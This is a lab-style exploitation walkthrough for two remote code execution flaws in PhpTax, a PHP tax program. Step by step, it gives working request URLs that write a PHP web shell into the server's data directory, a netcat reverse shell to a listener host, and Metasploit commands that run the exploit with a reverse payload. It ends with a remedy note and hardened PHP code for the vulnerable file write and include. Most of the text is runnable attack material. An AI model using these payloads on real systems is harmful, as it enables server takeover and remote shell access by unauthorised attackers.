PhpTax is free software for doing your U.S. income taxes. It has been tested in a Unix environment. The program generates PDFs that can be printed and sent to the IRS.

http://sourceforge.net/projects/phptax/

An attacker can use this vulnerability to write to arbitrary files or inject arbitrary code into a file. User-tainted data is used both to build the name of the file that is opened and to build the string that is written to it, so an attacker can write arbitrary PHP code into a .php file and fully compromise the server.

Field variable exploitation

https://www.exploit-db.com/exploits/25849

======================================

#index.php

#LINE 32: fwrite($zz, "$_GET['newvalue']");
#LINE 31: $zz = fopen("./data/$field", "w");
#LINE 2: $field = $_GET['field'];

======================================

1. Access this page and modify the values at will

  • http://{$url}/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]); ?>
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php system($_GET[cmd]); ?>
  • http://192.168.0.18:8080/phptax/index.php?field=rce.php&newvalue=<?php shell_exec($_GET[cmd]); ?>

2. Access the data directory to find the script

  • http://192.168.0.18:8080/phptax/data/

3. Locate and execute the script

  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=id

4. Knowing that we can execute system commands, we could also run a reverse shell

  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=nc%20-e%20/bin/bash%20192.168.0.13%204444
  • http://192.168.0.18:8080/phptax/data/rce.php?cmd=nc -e /bin/bash 192.168.0.13 4444

pfilez variable exploitation

https://www.exploit-db.com/exploits/21665

================================

drawimage.php, line 63:

include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");

================================

1. Access the phptax home folder

  • http://192.168.0.18:8080/phptax/index.php

2. Open any existing report; as you can see, the URL of the report carries a filled-in pfilez variable

  • http://192.168.0.18:8080/phptax/index.php?pfilez=1040pg2.tob

3. Now we can inject the code to execute a reverse connection. (In this case I get the connection but it immediately closes, so this is for demonstration only; it may need troubleshooting, but I'm lazy!! We just need the proof of concept.)

4. I even ran TCPDump to capture traffic

  • tcpdump -i wlan0 | grep 192.168.0.18

Note: we can also exploit drawimage.php instead of index.php.

Using Metasploit

1. Start the Metasploit service and search for "phptax"

  • service postgresql start
  • msfdb init
  • msfconsole
  • search phptax

2. Select the module and display its options

  • use exploit/multi/http/phptax_exec
  • show options

3. Show the available payloads and set one

  • show payloads
  • set payload cmd/unix/reverse
  • show options

4. Fill in the options marked "Required: yes"

  • set RHOSTS 192.168.0.18:8080
  • set RPORT 8080 # in this case the app is using that port
  • set LHOST 192.168.0.13

5. (EXTRA) In this particular scenario the site configuration requires the user agent to be spoofed as Mozilla/4.0; this is not usually required.

  • set UserAgent Mozilla/4.0
  • show advanced

6. Now run the exploit

  • exploit

Note: I had to run it twice. The first time the session expired.

Remedy

Validate the user-supplied field, newvalue and pfilez parameters before they are used to build a file name, a file's contents, or an include path.
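As an added example (not PhpTax's own code, nor the fix the project shipped), here is a hardened counterpart to the two vulnerable snippets quoted above: the index.php write driven by field/newvalue and the drawimage.php include driven by pfilez. The constants DATA_DIR and FILES_DIR, the functions safe_field_name(), save_field() and load_form(), the .txt suffix and the form table are all assumptions made for illustration.

```php
<?php
// Added example, not PhpTax's own code. Hardened replacements for the
// index.php write (field/newvalue) and the drawimage.php include (pfilez).
// DATA_DIR, FILES_DIR, the form table and all function names are assumed.
const DATA_DIR  = __DIR__ . '/data';
const FILES_DIR = __DIR__ . '/files';
// Only a short [a-z0-9_] token may become part of a file name, so values such
// as "rce.php" or "../x" are rejected before fopen() is ever reached.
function safe_field_name(string $field): ?string
{
    return preg_match('/^[a-z0-9_]{1,32}$/', $field) === 1 ? $field : null;
}

// Counterpart of: $zz = fopen("./data/$field", "w"); fwrite($zz, $_GET[newvalue]);
function save_field(string $field, string $value): bool
{
    $name = safe_field_name($field);
    if ($name === null) {
        return false;
    }
    // Belt and braces: the resolved parent directory must still be DATA_DIR.
    $path = DATA_DIR . '/' . $name . '.txt';
    if (realpath(dirname($path)) !== realpath(DATA_DIR)) {
        return false;
    }
    // Stored as plain data with a fixed .txt suffix and a length cap; the web
    // server should additionally be configured not to serve data/ at all.
    return file_put_contents($path, substr($value, 0, 4096), LOCK_EX) !== false;
}

// Counterpart of: include("./files/$_GET[pfilez]");
// The request selects a known form by key; the path is looked up, never built.
function load_form(string $pfilez): ?string
{
    $forms = ['1040pg1' => '1040pg1.tob', '1040pg2' => '1040pg2.tob']; // assumed table
    $key = preg_replace('/\.tob$/', '', $pfilez);
    if (!isset($forms[$key])) {
        return null;
    }
    $path = realpath(FILES_DIR . '/' . $forms[$key]);
    // realpath() is false for a missing file; a symlink escaping FILES_DIR fails the prefix test.
    if ($path === false || strpos($path, realpath(FILES_DIR) . '/') !== 0) {
        return null;
    }
    return $path;
}

$saved = save_field($_GET['field'] ?? '', $_GET['newvalue'] ?? '');
$form  = load_form($_GET['pfilez'] ?? '');
```

With these checks a request such as field=rce.php or pfilez=../../etc/passwd is refused before any file is opened, and nothing written from a request lands where the web server would execute it.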